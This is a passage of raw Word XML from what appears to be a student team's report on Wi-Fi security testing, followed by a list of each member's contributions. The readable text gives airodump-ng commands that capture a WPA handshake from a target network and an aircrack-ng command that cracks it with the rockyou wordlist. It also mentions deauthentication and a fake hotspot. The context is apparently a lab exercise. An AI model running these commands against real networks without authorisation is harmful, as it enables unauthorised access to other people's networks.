      <w:r w:rsidRPr="00F2418F">
        <w:t>airodump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F2418F">
        <w:t>-ng --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F2418F">
        <w:t>bssid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F2418F">
        <w:t xml:space="preserve"> &lt;BSSID&gt; -c &lt;channel&gt; -w capture wlan0mon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7405BB" w14:textId="77777777" w:rsidR="00F2418F" w:rsidRPr="00F2418F" w:rsidRDefault="00F2418F" w:rsidP="00F2418F">
      <w:r w:rsidRPr="00F2418F">
        <w:t>Then crack with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A63C520" w14:textId="77777777" w:rsidR="00F2418F" w:rsidRDefault="00F2418F" w:rsidP="00F2418F">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F2418F">
        <w:t>aircrack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F2418F">
        <w:t>-ng capture-01.cap -w /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F2418F">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F2418F">
        <w:t>/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EFF0B7" w14:textId="77777777" w:rsidR="00EC4B4E" w:rsidRDefault="00EC4B4E" w:rsidP="00F2418F"/>
    <w:p w14:paraId="4890D718" w14:textId="0292A483" w:rsidR="00EC4B4E" w:rsidRDefault="00EC4B4E" w:rsidP="00F2418F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CONTRIBUTION:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C1AC93" w14:textId="166ADF01" w:rsidR="00EC4B4E" w:rsidRDefault="00EC4B4E" w:rsidP="00F2418F">
      <w:r>
        <w:t>Anh Phan – work with main script, handshake capture and deauthorization files. Also, layout the software requirements and oversee.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C17ED8F" w14:textId="1DEF6AE3" w:rsidR="00EC4B4E" w:rsidRDefault="00EC4B4E" w:rsidP="00F2418F">
      <w:r>
        <w:t>Dawn Marshall – work with cracking handshake file using default wordlist and setting up fake hotspot to test capture. Also, reviewing file changes, adding description and updating README.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28213E2D" w14:textId="5134434E" w:rsidR="00EC4B4E" w:rsidRDefault="00EC4B4E" w:rsidP="00F2418F">
      <w:r>
        <w:t xml:space="preserve">Jared Robinson – work with setting up testing environment (installing supplement requirements, Linux header and enable Monitor Mode to test for Wi-Fi adapter on Kali Linux). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBEEF10" w14:textId="77777777" w:rsidR="00EC4B4E" w:rsidRPr="00EC4B4E" w:rsidRDefault="00EC4B4E" w:rsidP="00F2418F"/>
    <w:p w14:paraId="11832414" w14:textId="77777777" w:rsidR="003D536C" w:rsidRDefault="003D536C"/>
    <w:sectPr w:rsidR="003D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72A79"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D474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6A74"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5552A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6609F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0BA6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C02CA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3EFE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74EE4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9B3A9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6E2AF1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="46F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040E8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="975E9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7D7B40"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2B2C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565629">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="2020890341">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="16123368">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="2101289994">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="145097000">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1066415481">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="66390354">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="93513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8F"/>
    <w:rsid w:val="00131636"/>
    <w:rsid w:val="002A77B2"/>
    <w:rsid w:val="002B5DB0"/>
    <w:rsid w:val="003D536C"/>
    <w:rsid w:val="0041661C"/>
    <w:rsid w:val="00441A60"/>
    <w:rsid w:val="00551E0E"/>
    <w:rsid w:val="006C31DD"/>
    <w:rsid w:val="00727F85"/>
    <w:rsid w:val="00895743"/>
    <w:rsid w:val="0092122F"/>
    <w:rsid w:val="00977802"/>
    <w:rsid w:val="00A253B5"/>
    <w:rsid w:val="00AB36E2"/>
    <w:rsid w:val="00BB1A06"/>
    <w:rsid w:val="00C16EBB"/>
    <w:rsid w:val="00C32018"/>
    <w:rsid w:val="00C35E63"/>
    <w:rsid w:val="00CD6F46"/>
    <w:rsid w:val="00DC7A11"/>
    <w:rsid w:val="00DF50B4"/>
    <w:rsid w:val="00E63385"/>
    <w:rsid w:val="00EC4B4E"/>
    <w:rsid w:val="00EE66BE"/>
    <w:rsid w:val="00F2418F"/>
    <w:rsid w:val="00F51B7C"/>
    <w:rsid w:val="00F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5FBE"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2D2B00DE-D193-40FC-AA82-50BDDD7A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1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1A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8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08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9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-05-08T16:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-10T21:22:00Z</dcterms:modified>
</cp:coreProperties>
</file>